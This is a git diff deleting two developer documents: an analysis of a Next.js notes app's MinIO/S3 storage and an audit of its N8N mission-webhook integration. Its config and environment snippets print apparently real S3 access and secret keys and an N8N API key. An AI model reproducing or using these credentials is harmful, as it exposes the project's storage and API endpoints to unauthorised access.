diff --git a/.DS_Store b/.DS_Store
index 03adda7..680a9f9 100644
Binary files a/.DS_Store and b/.DS_Store differ
diff --git a/ANALYSE_PAGES_S3.md b/ANALYSE_PAGES_S3.md
deleted file mode 100644
index 94932d2..0000000
--- a/ANALYSE_PAGES_S3.md
+++ /dev/null
@@ -1,438 +0,0 @@
-# Complete Analysis: the "Pages" Page and S3 Integration
-
-## 📋 Overview
-
-The `/pages` page is a notes-and-contacts (notebook) application that uses S3-compatible storage (MinIO) to persist user data.
-
---
-
-## 🗂️ Route Structure
-
-### Frontend Route
-- **URL**: `/pages`
-- **File**: `app/pages/page.tsx`
-- **Type**: Client Component (Next.js App Router)
-- **Authentication**: required (redirects to `/signin` when unauthenticated)
-
-### API Routes
-
-#### 1. Primary Routes (`/api/storage/*`)
-- **`GET /api/storage/status`**: lists the folders available to the user
-- **`POST /api/storage/init`**: initializes the folder structure for a new user
-- **`POST /api/storage/init/folder`**: creates a specific folder
-- **`GET /api/storage/files?folder={folder}`**: lists the files in a folder
-- **`GET /api/storage/files/content?path={path}`**: fetches a file's content
-- **`POST /api/storage/files`**: creates a new file
-- **`PUT /api/storage/files`**: updates an existing file
-- **`DELETE /api/storage/files?id={id}`**: deletes a file
-
-#### 2. Compatibility Routes (`/api/nextcloud/*`)
-- **Adapter pattern**: the `/api/nextcloud/*` routes forward to `/api/storage/*`
-- **Reason**: compatibility with older code that used NextCloud
-- **Files**:
-  - `app/api/nextcloud/status/route.ts` → returns the standard folders
-  - `app/api/nextcloud/files/route.ts` → forwards to `/api/storage/files`
-
---
-
-## 🧩 Main Components
-
-### 1. **Main Page** (`app/pages/page.tsx`)
-
-**Responsibilities**:
-- Global state management (notes, contacts, selected folders)
-- Orchestration of the three panels (Navigation, List, Editor)
-- Multi-level cache management
-- Responsive behavior (mobile/tablet/desktop)
-
-**Main State**:
-```typescript
-- selectedFolder: string (Notes, Diary, Health, Contacts)
-- selectedNote: Note | null
-- selectedContact: Contact | null
-- notes: Note[]
-- contacts: Contact[]
-- nextcloudFolders: string[]
-```
-
-**Cache**:
-- **In-memory**: `notesCache`, `noteContentCache`, `foldersCache`
-- **localStorage**: persistent cache with expiration (5-15 minutes)
-
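-The cache helpers themselves are not shown in this document. As a minimal sketch of how a localStorage entry with expiration might be read and written (the names `cacheGet`/`cacheSet` and the key layout are assumptions, not the actual implementation in `app/pages/page.tsx`):
-
-```typescript
-// Sketch only: a localStorage cache entry with expiration. Helper names
-// and key layout are assumed, not taken from the real code.
-interface CacheEntry<T> {
-  value: T;
-  expiresAt: number; // epoch milliseconds
-}
-
-function cacheSet<T>(key: string, value: T, ttlMs: number): void {
-  const entry: CacheEntry<T> = { value, expiresAt: Date.now() + ttlMs };
-  localStorage.setItem(key, JSON.stringify(entry));
-}
-
-function cacheGet<T>(key: string): T | null {
-  const raw = localStorage.getItem(key);
-  if (!raw) return null;
-  const entry = JSON.parse(raw) as CacheEntry<T>;
-  if (Date.now() > entry.expiresAt) {
-    localStorage.removeItem(key); // expired: drop the stale entry
-    return null;
-  }
-  return entry.value;
-}
-
-// Usage matching the documented TTL for note lists (5 minutes):
-// cacheSet(`notes:${folder}`, notes, 5 * 60 * 1000);
-```
-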
-### 2. **Navigation** (`components/carnet/navigation.tsx`)
-
-**Features**:
-- Displays the folders (Notes, Diary, Health, Contacts)
-- Folder search
-- Expands the Contacts folder to show VCF files
-- Context-aware icons per folder type
-
-**Standard Folders**:
-- `Notes` → Notepad
-- `Diary` → Journal
-- `Health` → Health record
-- `Contacts` → Address book
-
-### 3. **NotesView** (`components/carnet/notes-view.tsx`)
-
-**Features**:
-- Note list with search
-- Sorted by modification date
-- Formatted date display
-- Actions: create, delete, select
-- Special formatting for Diary/Health (date extraction)
-
-### 4. **ContactsView** (`components/carnet/contacts-view.tsx`)
-
-**Features**:
-- Contact list with search
-- Filtering by name, email, organization
-- Support for multiple VCF files
-- Creation of new contacts
-
-### 5. **Editor** (`components/carnet/editor.tsx`)
-
-**Features**:
-- Markdown note editing
-- Automatic saving (1-second debounce)
-- Content caching for performance
-- Error and loading-state handling
-
-**Saving**:
-- Auto-save after 1 second of inactivity
-- Uses `PUT /api/storage/files` for updates
-- Invalidates the cache after saving
-
-### 6. **ContactDetails** (`components/carnet/contact-details.tsx`)
-
-**Features**:
-- Detailed contact display
-- Inline field editing
-- VCard support (vCard 3.0)
-- Saves to VCF files
-
---
-
-## 🔌 S3 Configuration
-
-### Configuration File (`lib/s3.ts`)
-
-```typescript
-S3_CONFIG = {
-  endpoint: 'https://dome-api.slm-lab.net',
-  region: 'us-east-1',
-  bucket: process.env.S3_BUCKET || 'pages',
-  accessKey: '4aBT4CMb7JIMMyUtp4Pl',
-  secretKey: 'HGn39XhCIlqOjmDVzRK9MED2Fci2rYvDDgbLFElg'
-}
-```
-
-**Storage type**: MinIO (S3-compatible)
-**Client**: AWS SDK v3 (`@aws-sdk/client-s3`)
-
-### Storage Layout
-
-```
-bucket: pages/
-└── user-{userId}/
-    ├── notes/
-    │   ├── note1.md
-    │   └── note2.md
-    ├── diary/
-    │   └── 2024-01-15-entry.md
-    ├── health/
-    │   └── health-record.md
-    └── contacts/
-        ├── Allemanique.vcf
-        └── contacts.vcf
-```
-
-**S3 Key Format**:
-- Notes: `user-{userId}/{folder}/{title}.md`
-- Contacts: `user-{userId}/contacts/{filename}.vcf`
-
-### Main S3 Functions
-
-#### `putObject(key, content, contentType)`
-- Uploads a file to S3
-- Automatically converts strings to UTF-8 Buffers
-- Returns the key of the created file
-
-#### `getObjectContent(key)`
-- Fetches a file's content
-- Streams the content and converts it to a UTF-8 string
-- Returns `null` if the file does not exist
-
-#### `deleteObject(key)`
-- Deletes a file from S3
-- Uses `DeleteObjectCommand`
-
-#### `listUserObjects(userId, folder)`
-- Lists the objects in a user folder
-- Filters out placeholders and empty folders
-- Returns metadata (name, size, modification date)
-
-#### `createUserFolderStructure(userId)`
-- Creates the standard folder structure
-- Creates a `.placeholder` file in each folder
-- Folders created: `notes`, `diary`, `health`, `contacts`
-
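-For reference, a minimal sketch of what `getObjectContent` might look like with AWS SDK v3, reconstructed from the description above (this is an assumption, not the actual code in `lib/s3.ts`; `transformToString` is available on the v3 response body in recent SDK versions):
-
-```typescript
-// Assumed reconstruction of getObjectContent() based on the description
-// above; the real lib/s3.ts implementation may differ.
-import { S3Client, GetObjectCommand, NoSuchKey } from '@aws-sdk/client-s3';
-
-const s3 = new S3Client({
-  endpoint: 'https://dome-api.slm-lab.net',
-  region: 'us-east-1',
-  credentials: {
-    accessKeyId: process.env.S3_ACCESS_KEY!,     // assumed variable names
-    secretAccessKey: process.env.S3_SECRET_KEY!,
-  },
-  forcePathStyle: true, // commonly required for MinIO endpoints
-});
-
-export async function getObjectContent(key: string): Promise<string | null> {
-  try {
-    const res = await s3.send(
-      new GetObjectCommand({ Bucket: process.env.S3_BUCKET || 'pages', Key: key })
-    );
-    // Stream the body and decode it as UTF-8.
-    return (await res.Body?.transformToString('utf-8')) ?? null;
-  } catch (err) {
-    // Return null when the object does not exist, as described above.
-    if (err instanceof NoSuchKey) return null;
-    throw err;
-  }
-}
-```
-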
---
-
-## 🔄 Data Flows
-
-### 1. Initialization
-
-```
-User login
-    ↓
-POST /api/storage/init
-    ↓
-createUserFolderStructure(userId)
-    ↓
-Folder creation in S3
-    ↓
-GET /api/storage/status
-    ↓
-Folders displayed in Navigation
-```
-
-### 2. Loading Notes
-
-```
-User selects a folder
-    ↓
-Check cache (in-memory → localStorage)
-    ↓
-If cache valid → use cache
-    ↓
-Otherwise → GET /api/storage/files?folder={folder}
-    ↓
-listUserObjects(userId, folder)
-    ↓
-Cache update + display
-```
-
-### 3. Editing a Note
-
-```
-User selects a note
-    ↓
-Check the content cache
-    ↓
-If cache valid → display
-    ↓
-Otherwise → GET /api/storage/files/content?path={id}
-    ↓
-getObjectContent(key)
-    ↓
-Display in Editor
-```
-
-### 4. Saving a Note
-
-```
-User edits the content
-    ↓
-1-second debounce
-    ↓
-PUT /api/storage/files
-    ↓
-putObject(key, content, 'text/markdown')
-    ↓
-Cache invalidation
-    ↓
-List refresh
-```
-
-### 5. Contact Management
-
-```
-User selects "Contacts"
-    ↓
-GET /api/storage/files?folder=contacts
-    ↓
-Filter the .vcf files
-    ↓
-For each VCF → GET /api/storage/files/content
-    ↓
-VCard parsing with vcard-parser
-    ↓
-Display in ContactsView
-```
-
---
-
-## 🎨 UI Architecture
-
-### Responsive Layout
-
-**Desktop (> 1024px)**:
-- 3 panels: Navigation | List | Editor
-- Resizable panels via `PanelResizer`
-
-**Tablet (768px - 1024px)**:
-- 2 panels: Navigation | List/Editor
-- Navigation always visible
-
-**Mobile (< 768px)**:
-- 1 panel at a time
-- Toggle button for navigation
-- Navigation overlay
-
-### Cache System
-
-**Cache Levels**:
-1. **In-memory**: `useRef` for immediate performance
-2. **localStorage**: persistence across sessions
-3. **S3**: source of truth
-
-**Expiration**:
-- Note list: 5 minutes
-- Note content: 15 minutes
-- Folder list: 2 minutes
-
-**Invalidation**:
-- After a note is saved
-- After creation/deletion
-- After the `note-saved` event (CustomEvent)
-
---
-
-## 🔐 Security
-
-### Authentication
-- **NextAuth**: session check on every API route
-- **User isolation**: every S3 path includes `user-{userId}/`
-- **Validation**: ensures a user can only access their own files
-
-### Validation Example
-```typescript
-// In /api/storage/files/content/route.ts
-if (!key.startsWith(`user-${userId}/`)) {
-  return NextResponse.json({ error: 'Unauthorized' }, { status: 403 });
-}
-```
-
---
-
-## 📝 File Formats
-
-### Notes
-- **Format**: Markdown (`.md`)
-- **MIME type**: `text/markdown`
-- **Structure**: free-form text with Markdown support
-
-### Contacts
-- **Format**: vCard 3.0 (`.vcf`)
-- **MIME type**: `text/vcard`
-- **Library**: `vcard-parser` for parsing/formatting
-- **Structure**: multiple vCards per file
-
-**VCard Example**:
-```
-BEGIN:VCARD
-VERSION:3.0
-UID:{id}
-FN:{fullName}
-EMAIL;TYPE=INTERNET:{email}
-TEL;TYPE=CELL:{phone}
-ORG:{organization}
-ADR:{address}
-NOTE:{notes}
-END:VCARD
-```
-
---
-
-## 🐛 Points of Attention
-
-### 1. **NextCloud/S3 Compatibility**
-- The code sometimes calls `/api/nextcloud/*` and sometimes `/api/storage/*`
-- The NextCloud routes are adapters that forward to Storage
-- **Recommendation**: migrate progressively to `/api/storage/*` only
-
-### 2. **Case Handling**
-- Folder names are normalized to lowercase for S3
-- But the UI uses the original casing (Notes, Diary, etc.)
-- **Risk**: inconsistencies if a folder is created with different casing
-
-### 3. **Multi-Level Cache**
-- Synchronization between the caches is complex
-- **Risk**: stale data if invalidation is incomplete
-
-### 4. **Hardcoded S3 Credentials**
-- The S3 access keys are hardcoded in `lib/s3.ts`
-- **Recommendation**: use environment variables
-
-### 5. **Error Handling**
-- Some errors are logged but not always surfaced to the user
-- **Recommendation**: improve user feedback
-
---
-
-## 🚀 Suggested Improvements
-
-### 1. **Security**
-- [ ] Move the S3 credentials to environment variables (see the sketch below)
-- [ ] Implement rate limits on the APIs
-- [ ] Add stricter path validation
-
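-A minimal sketch of the first item, assuming `S3_ENDPOINT`, `S3_ACCESS_KEY`, and `S3_SECRET_KEY` as variable names (these names are not defined anywhere in the codebase yet):
-
-```typescript
-// lib/s3.ts — sketch: read credentials from the environment instead of
-// hardcoding them. The variable names are assumptions, not existing config.
-function requireEnv(name: string): string {
-  const value = process.env[name];
-  if (!value) throw new Error(`Missing required environment variable: ${name}`);
-  return value;
-}
-
-export const S3_CONFIG = {
-  endpoint: process.env.S3_ENDPOINT || 'https://dome-api.slm-lab.net',
-  region: process.env.S3_REGION || 'us-east-1',
-  bucket: process.env.S3_BUCKET || 'pages',
-  accessKey: requireEnv('S3_ACCESS_KEY'), // fail fast rather than fall back to a hardcoded key
-  secretKey: requireEnv('S3_SECRET_KEY'),
-};
-```
-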
-### 2. **Performance**
-- [ ] Implement pagination for large lists
-- [ ] Optimize S3 queries with more specific prefixes
-- [ ] Add compression for large files
-
-### 3. **UX**
-- [ ] Add synchronization indicators
-- [ ] Implement conflict handling for concurrent edits
-- [ ] Improve user-facing error messages
-
-### 4. **Architecture**
-- [ ] Unify the API routes (remove the NextCloud adapters)
-- [ ] Create a service layer to abstract S3
-- [ ] Implement unit tests for the S3 functions
-
---
-
-## 📊 Metrics and Monitoring
-
-### Endpoints to Monitor
-- S3 request response times
-- Error rate of CRUD operations
-- Cache usage (hit rate)
-- Uploaded file sizes
-
-### Important Logs
-- Authentication errors
-- S3 connection failures
-- VCard parsing failures
-- Cache inconsistencies
-
---
-
-## 🔗 Key Dependencies
-
-```json
-{
-  "@aws-sdk/client-s3": "^3.802.0",
-  "@aws-sdk/s3-request-presigner": "^3.802.0",
-  "vcard-parser": "^x.x.x",
-  "next-auth": "^x.x.x"
-}
-```
-
---
-
-## 📚 References
-
-- **S3 config file**: `lib/s3.ts`
-- **Main page**: `app/pages/page.tsx`
-- **Storage API routes**: `app/api/storage/**/*.ts`
-- **NextCloud API routes**: `app/api/nextcloud/**/*.ts`
-- **Components**: `components/carnet/*.tsx`
-
---
-
-*Document generated on: $(date)*
-*Last updated: full analysis of the Pages/S3 system*
diff --git a/AUDIT_API_N8N_CONNECTION.md b/AUDIT_API_N8N_CONNECTION.md
deleted file mode 100644
index e97bc94..0000000
--- a/AUDIT_API_N8N_CONNECTION.md
+++ /dev/null
@@ -1,724 +0,0 @@
-# 🔍 Senior Developer Audit - Next.js ↔️ N8N API Connection (Missions)
-
-**Date**: $(date)
-**Author**: Senior Developer Audit
-**Goal**: Verify and document the connection between Next.js and N8N for mission management
-
---
-
-## 📋 Table of Contents
-
-1. [Global Architecture](#global-architecture)
-2. [Communication Flow](#communication-flow)
-3. [API Endpoints](#api-endpoints)
-4. [Required Configuration](#required-configuration)
-5. [Security](#security)
-6. [Critical Points to Check](#critical-points-to-check)
-7. [Potential Problems and Solutions](#potential-problems-and-solutions)
-8. [Tests and Validation](#tests-and-validation)
-9. [Recommendations](#recommendations)
-
--
-
-## 🏗️ Global Architecture
-
-### Overview
-
-```
-┌─────────────┐         ┌─────────────┐         ┌─────────────┐
-│   Next.js   │────────▶│     N8N     │────────▶│ Integrations│
-│    (API)    │         │  (Workflow) │         │ (Gitea, etc)│
-└─────────────┘         └─────────────┘         └─────────────┘
-       │                        │
-       │                        │
-       └────────────────────────┘
-              (Callback)
-```
-
-### Main Components
-
-1. **Next.js API Routes**
-   - `POST /api/missions` - Mission creation
-   - `POST /api/missions/mission-created` - Callback from N8N
-   - `GET /api/missions` - Mission list
-
-2. **N8N Service** (`lib/services/n8n-service.ts`)
-   - Sends data to N8N (sketched below)
-   - Webhook handling
-   - Error handling
-
-3. **N8N Workflows**
-   - Inbound webhook: `/webhook/mission-created`
-   - Creation of the external integrations
-   - Callback to Next.js
-
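-Before diving into the flow, a condensed sketch of the outbound call that Step 2 below describes (the payload fields and headers come from this document; the function name and timeout handling are assumptions — the real implementation lives in `lib/services/n8n-service.ts`):
-
-```typescript
-// Sketch of the Next.js → N8N webhook call (assumed shape, not the actual
-// n8n-service code). Uses AbortController for a timeout.
-export async function triggerMissionWorkflow(mission: { id: string; name: string }) {
-  const webhookUrl =
-    process.env.N8N_WEBHOOK_URL || 'https://brain.slm-lab.net/webhook/mission-created';
-  const controller = new AbortController();
-  const timer = setTimeout(() => controller.abort(), 30_000); // assumed 30s timeout
-
-  try {
-    const res = await fetch(webhookUrl, {
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'x-api-key': process.env.N8N_API_KEY ?? '',
-      },
-      body: JSON.stringify({
-        missionId: mission.id,
-        name: mission.name,
-        config: {
-          N8N_API_KEY: process.env.N8N_API_KEY,
-          MISSION_API_URL: process.env.NEXT_PUBLIC_API_URL || 'https://api.slm-lab.net/api',
-        },
-      }),
-      signal: controller.signal,
-    });
-    return { success: res.ok, status: res.status };
-  } finally {
-    clearTimeout(timer);
-  }
-}
-```
-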
--
-
-## 🔄 Communication Flow
-
-### 1. Creating a Mission (Next.js → N8N → Next.js)
-
-```
-┌─────────────────────────────────────────────────────────────────┐
-│ STEP 1: Mission creation in Next.js                             │
-└─────────────────────────────────────────────────────────────────┘
-POST /api/missions
-  ↓
-1. Validate the data
-2. Create the record in the database (Prisma)
-3. Upload the files (logo, attachments) to Minio
-4. Verify the files
-  ↓
-┌─────────────────────────────────────────────────────────────────┐
-│ STEP 2: Send to N8N                                             │
-└─────────────────────────────────────────────────────────────────┘
-POST https://brain.slm-lab.net/webhook/mission-created
-Headers:
-  - Content-Type: application/json
-  - x-api-key: {N8N_API_KEY}
-Body:
-  {
-    missionId: "uuid",
-    name: "...",
-    oddScope: [...],
-    services: [...],
-    config: {
-      N8N_API_KEY: "...",
-      MISSION_API_URL: "https://api.slm-lab.net/api"
-    },
-    ...
-  }
-  ↓
-┌─────────────────────────────────────────────────────────────────┐
-│ STEP 3: N8N processing                                          │
-└─────────────────────────────────────────────────────────────────┘
-N8N Workflow:
-  1. Receive the webhook
-  2. Create the Gitea repository (if service "Gite")
-  3. Create the Leantime project (if service "Leantime")
-  4. Create the Outline collection (if service "Documentation")
-  5. Create the RocketChat channel (if service "RocketChat")
-  6. Prepare the callback data
-  ↓
-┌─────────────────────────────────────────────────────────────────┐
-│ STEP 4: Callback N8N → Next.js                                  │
-└─────────────────────────────────────────────────────────────────┘
-POST {MISSION_API_URL}/api/missions/mission-created
-Headers:
-  - Content-Type: application/json
-  - x-api-key: {N8N_API_KEY} (from config.N8N_API_KEY)
-Body:
-  {
-    missionId: "uuid",
-    gitRepoUrl: "...",
-    leantimeProjectId: "...",
-    documentationCollectionId: "...",
-    rocketchatChannelId: "..."
-  }
-  ↓
-┌─────────────────────────────────────────────────────────────────┐
-│ STEP 5: Mission update in Next.js                               │
-└─────────────────────────────────────────────────────────────────┘
-Validate the API key
-Look up the mission by missionId
-Update the integration fields:
-  - giteaRepositoryUrl
-  - leantimeProjectId
-  - outlineCollectionId
-  - rocketChatChannelId
-```
-
--
-
-## 🔌 API Endpoints
-
-### 1. POST /api/missions
-
-**File**: `app/api/missions/route.ts`
-
-**Purpose**: Create a new mission and trigger the N8N workflow
-
-**Authentication**:
-- User session required (via `getServerSession`)
-- Check: `checkAuth(request)`
-
-**Expected body**:
-```typescript
-{
-  name: string;
-  oddScope: string[];
-  niveau?: string;
-  intention?: string;
-  missionType?: string;
-  services?: string[];
-  guardians?: Record;
-  volunteers?: string[];
-  logo?: { data: string; name?: string; type?: string };
-  attachments?: Array<{ data: string; name?: string; type?: string }>;
-}
-```
-
-**Response**:
-```json
-{
-  "success": true,
-  "mission": { ... },
-  "message": "Mission created successfully with all integrations"
-}
-```
-
-**Critical points**:
-- ✅ Mission is created in the database BEFORE sending to N8N
-- ✅ Files are uploaded and verified BEFORE sending to N8N
-- ✅ `missionId` is included in the data sent to N8N
-- ✅ `config.N8N_API_KEY` and `config.MISSION_API_URL` are included
-
--
-
-### 2. POST /api/missions/mission-created
-
-**File**: `app/api/missions/mission-created/route.ts`
-
-**Purpose**: Receive the integration IDs from N8N and update the mission
-
-**Authentication**:
-- **API key** via the `x-api-key` header
-- **NO** user session required (N8N has no session)
-
-**Required headers**:
-```
-x-api-key: {N8N_API_KEY}
-Content-Type: application/json
-```
-
-**Expected body**:
-```typescript
-{
-  missionId: string;        // ✅ Preferred (more reliable)
-  // OR (fallback for compatibility)
-  name: string;
-  creatorId: string;
-
-  // Integration IDs (optional)
-  gitRepoUrl?: string;
-  leantimeProjectId?: string | number;
-  documentationCollectionId?: string;
-  rocketchatChannelId?: string;
-}
-```
-
-**Success response**:
-```json
-{
-  "success": true,
-  "message": "Mission updated successfully",
-  "mission": {
-    "id": "...",
-    "name": "...",
-    "giteaRepositoryUrl": "...",
-    "leantimeProjectId": "...",
-    "outlineCollectionId": "...",
-    "rocketChatChannelId": "..."
-  }
-}
-```
-
-**Error codes**:
-- `401` - Invalid or missing API key
-- `400` - Missing required fields
-- `404` - Mission not found
-- `500` - Server error
-
-**Critical points**:
-- ✅ Strict validation of the API key
-- ✅ Lookup by `missionId` (preferred) or `name + creatorId` (fallback)
-- ✅ `leantimeProjectId` converted from number to string when necessary
-- ✅ Only the provided fields are updated
-
--
-
-## ⚙️ Required Configuration
-
-### Environment Variables
-
-#### 1. N8N_API_KEY (REQUIRED)
-```env
-N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4
-```
-
-**Usage**:
-- Sent to N8N in `config.N8N_API_KEY`
-- N8N uses it to authenticate the callback
-- Checked server-side in `/api/missions/mission-created`
-
-**Where to configure**:
-- `.env.local` (development)
-- Production environment variables (CapRover, Vercel, Docker, etc.)
-
-**Check** (see the startup-validation sketch below):
-```typescript
-// Error if not set
-if (!process.env.N8N_API_KEY) {
-  logger.error('N8N_API_KEY is not set in environment variables');
-}
-```
-
--
-
-#### 2. N8N_WEBHOOK_URL (Optional)
-```env
-N8N_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-created
-```
-
-**Default**: `https://brain.slm-lab.net/webhook/mission-created`
-
-**Usage**: URL of the N8N webhook for mission creation
-
--
-
-#### 3. NEXT_PUBLIC_API_URL (Recommended)
-```env
-NEXT_PUBLIC_API_URL=https://api.slm-lab.net/api
-```
-
-**Usage**:
-- Sent to N8N in `config.MISSION_API_URL`
-- N8N uses it to build the callback URL
-- Expected format: `{MISSION_API_URL}/api/missions/mission-created`
-
-**Default**: `https://api.slm-lab.net/api`
-
--
-
-#### 4. N8N_ROLLBACK_WEBHOOK_URL (Optional)
-```env
-N8N_ROLLBACK_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-rollback
-```
-
-**Usage**: URL of the N8N webhook for mission rollback
-
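-A small sketch of the fail-fast validation that the "Check" note above hints at, run once at startup (the `validateEnv` helper is an assumption, not existing code; only `N8N_API_KEY` is strictly required per this document):
-
-```typescript
-// Sketch: fail-fast environment validation at startup (assumed helper).
-// Only N8N_API_KEY is mandatory per this audit.
-const REQUIRED = ['N8N_API_KEY'] as const;
-const OPTIONAL_WITH_DEFAULTS: Record<string, string> = {
-  N8N_WEBHOOK_URL: 'https://brain.slm-lab.net/webhook/mission-created',
-  NEXT_PUBLIC_API_URL: 'https://api.slm-lab.net/api',
-};
-
-export function validateEnv(): void {
-  const missing = REQUIRED.filter((name) => !process.env[name]);
-  if (missing.length > 0) {
-    throw new Error(`Missing required environment variables: ${missing.join(', ')}`);
-  }
-  for (const [name, fallback] of Object.entries(OPTIONAL_WITH_DEFAULTS)) {
-    if (!process.env[name]) {
-      console.warn(`${name} not set, falling back to default: ${fallback}`);
-    }
-  }
-}
-```
-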
--
-
-### N8N Workflow Configuration
-
-#### Inbound Webhook
-
-**Path**: `mission-created`
-**Full URL**: `https://brain.slm-lab.net/webhook/mission-created`
-**Method**: `POST`
-**Status**: must be **ACTIVE** (green toggle in N8N)
-
--
-
-#### "Save Mission To API" Node
-
-**URL**:
-```
-{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created
-```
-
-**Method**: `POST`
-
-**Headers**:
-```
-Content-Type: application/json
-x-api-key: {{ $node['Process Mission Data'].json.config.N8N_API_KEY }}
-```
-
-**Body**:
-```json
-{
-  "missionId": "{{ $node['Process Mission Data'].json.missionId }}",
-  "gitRepoUrl": "{{ $node['Create Git Repo'].json.url }}",
-  "leantimeProjectId": "{{ $node['Create Leantime Project'].json.id }}",
-  "documentationCollectionId": "{{ $node['Create Outline Collection'].json.id }}",
-  "rocketchatChannelId": "{{ $node['Create RocketChat Channel'].json.id }}"
-}
-```
-
-**Critical points**:
-- ✅ Use `config.MISSION_API_URL` (no hardcoded URL)
-- ✅ Use `config.N8N_API_KEY` (no hardcoded key)
-- ✅ Include `missionId` in the body
-- ✅ Include all created integration IDs
-
--
-
-## 🔒 Security
-
-### 1. API Key Authentication
-
-**Mechanism**:
-- N8N sends the `x-api-key` header
-- Next.js compares it with `process.env.N8N_API_KEY`
-- If they differ → `401 Unauthorized`
-
-**Validation code** (`app/api/missions/mission-created/route.ts:42`):
-```typescript
-const apiKey = request.headers.get('x-api-key');
-const expectedApiKey = process.env.N8N_API_KEY;
-
-if (apiKey !== expectedApiKey) {
-  logger.error('Invalid API key', {
-    received: apiKey ? 'present' : 'missing',
-    expected: expectedApiKey ? 'configured' : 'missing'
-  });
-  return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });
-}
-```
-
-**Critical points**:
-- ✅ Strict comparison (no hashing, plaintext key)
-- ✅ Invalid attempts are logged
-- ✅ No fallback when the key is missing
-
--
-
-### 2. API Key Transmission
-
-**Flow**:
-1. Next.js reads `process.env.N8N_API_KEY`
-2. Next.js sends it to N8N in `config.N8N_API_KEY`
-3. N8N stores it temporarily in the workflow
-4. N8N sends it back in the `x-api-key` header on the callback
-
-**Risk**: if `N8N_API_KEY` is `undefined` at send time:
-- N8N receives `undefined` or an empty string
-- N8N sends an empty string in the header
-- Next.js rejects with `401`
-
-**Solution**: verify that `N8N_API_KEY` is defined before sending to N8N
-
--
-
-### 3. Data Validation
-
-**On the Next.js side**:
-- ✅ Required fields are validated
-- ✅ Mission lookup by `missionId` (safer than `name + creatorId`)
-- ✅ Type conversions (number → string for `leantimeProjectId`)
-
-**On the N8N side**:
-- ⚠️ No validation visible from the Next.js code
-- ⚠️ N8N must validate the data before creating the integrations
-
--
-
-## ⚠️ Critical Points to Check
-
-### 1. Environment Configuration
-
-- [ ] `N8N_API_KEY` is defined in the environment
-- [ ] `N8N_API_KEY` has the same value everywhere (dev, staging, prod)
-- [ ] `NEXT_PUBLIC_API_URL` points to the right URL
-- [ ] The application was restarted after changing the variables
-
--
-
-### 2. N8N Workflow
-
-- [ ] The workflow is **ACTIVE** (green toggle)
-- [ ] The webhook path is correct: `mission-created`
-- [ ] The "Save Mission To API" node uses `config.MISSION_API_URL`
-- [ ] The "Save Mission To API" node uses `config.N8N_API_KEY`
-- [ ] The "Save Mission To API" node includes `missionId` in the body
-- [ ] All integration IDs are included in the callback
-
--
-
-### 3. Data Flow
-
-- [ ] `missionId` is sent to N8N at creation time
-- [ ] `missionId` is sent back by N8N in the callback
-- [ ] The integration IDs are mapped correctly:
-  - `gitRepoUrl` → `giteaRepositoryUrl`
-  - `leantimeProjectId` → `leantimeProjectId` (string)
-  - `documentationCollectionId` → `outlineCollectionId`
-  - `rocketchatChannelId` → `rocketChatChannelId`
-
--
-
-### 4. Error Handling
-
-- [ ] N8N errors are logged
-- [ ] Rollback on failure (if configured)
-- [ ] Clear error messages for debugging
-- [ ] No sensitive data in the logs
-
--
-
-## 🐛 Potential Problems and Solutions
-
-### Problem 1: 401 Unauthorized
-
-**Symptoms**:
-```
-Invalid API key { received: 'present', expected: 'configured' }
-```
-
-**Possible causes**:
-1. `N8N_API_KEY` is not defined in the environment
-2. `N8N_API_KEY` differs between Next.js and N8N
-3. N8N sends an empty or `undefined` key
-
-**Solutions**:
-1. Verify that `N8N_API_KEY` is defined:
-   ```bash
-   echo $N8N_API_KEY
-   ```
-2. Verify the value inside N8N:
-   - Open the workflow execution
-   - Check `config.N8N_API_KEY` in "Process Mission Data"
-3. Make sure the same key is used everywhere
-
--
-
-### Problem 2: 404 Mission Not Found
-
-**Symptoms**:
-```
-Mission not found { missionId: "...", name: "...", creatorId: "..." }
-```
-
-**Possible causes**:
-1. `missionId` was not sent by N8N
-2. `missionId` is incorrect
-3. The mission was deleted in the meantime
-
-**Solutions**:
-1. Verify that N8N sends `missionId`:
-   ```json
-   {
-     "missionId": "{{ $node['Process Mission Data'].json.missionId }}"
-   }
-   ```
-2. Verify that Next.js sends `missionId` to N8N:
-   ```typescript
-   config: {
-     missionId: mission.id // ✅ Included in n8nData
-   }
-   ```
-3. Use the `name + creatorId` fallback when `missionId` is missing (see the sketch below)
-
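-A sketch of the lookup-with-fallback described above (the Prisma call shapes and the `@/lib/prisma` import path are assumptions; the actual route code may differ):
-
-```typescript
-// Sketch: find the mission by id first, then fall back to name + creatorId,
-// mirroring the fallback behavior described in this document.
-import { prisma } from '@/lib/prisma';
-
-async function findMission(body: { missionId?: string; name?: string; creatorId?: string }) {
-  if (body.missionId) {
-    const byId = await prisma.mission.findUnique({ where: { id: body.missionId } });
-    if (byId) return byId;
-  }
-  if (body.name && body.creatorId) {
-    // Fallback kept for compatibility with older N8N workflows.
-    return prisma.mission.findFirst({
-      where: { name: body.name, creatorId: body.creatorId },
-    });
-  }
-  return null;
-}
-```
-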
--
-
-### Problem 3: 500 Server Configuration Error
-
-**Symptoms**:
-```
-N8N_API_KEY not configured in environment
-```
-
-**Cause**: `process.env.N8N_API_KEY` is `undefined`
-
-**Solution**:
-1. Add `N8N_API_KEY` to `.env.local` or the environment variables
-2. Restart the application
-3. Verify with a test endpoint
-
--
-
-### Problem 4: 404 Webhook Not Registered
-
-**Symptoms**:
-```
-404 Error: The requested webhook "mission-created" is not registered.
-Hint: Click the 'Execute workflow' button on the canvas, then try again.
-```
-
-**Cause**: the N8N workflow is not active
-
-**Solution**:
-1. Open the workflow in N8N
-2. Enable the "Active" toggle (it should be green)
-3. Verify that the webhook node is active
-
--
-
-### Problem 5: Integration IDs Not Saved
-
-**Symptoms**:
-- The mission is created but `giteaRepositoryUrl`, `leantimeProjectId`, etc. are `null`
-
-**Possible causes**:
-1. N8N never calls back `/api/missions/mission-created`
-2. N8N calls back but with missing IDs
-3. Error while updating the database
-
-**Solutions**:
-1. Check the N8N logs (Executions)
-2. Verify that the "Save Mission To API" node runs
-3. Check the Next.js logs for "Mission Created Webhook Received"
-4. Verify that all IDs are included in the callback body
-
--
-
-## 🧪 Tests and Validation
-
-### Test 1: Verify the Configuration
-
-**Test endpoint** (to be created):
-```typescript
-// app/api/test-n8n-config/route.ts
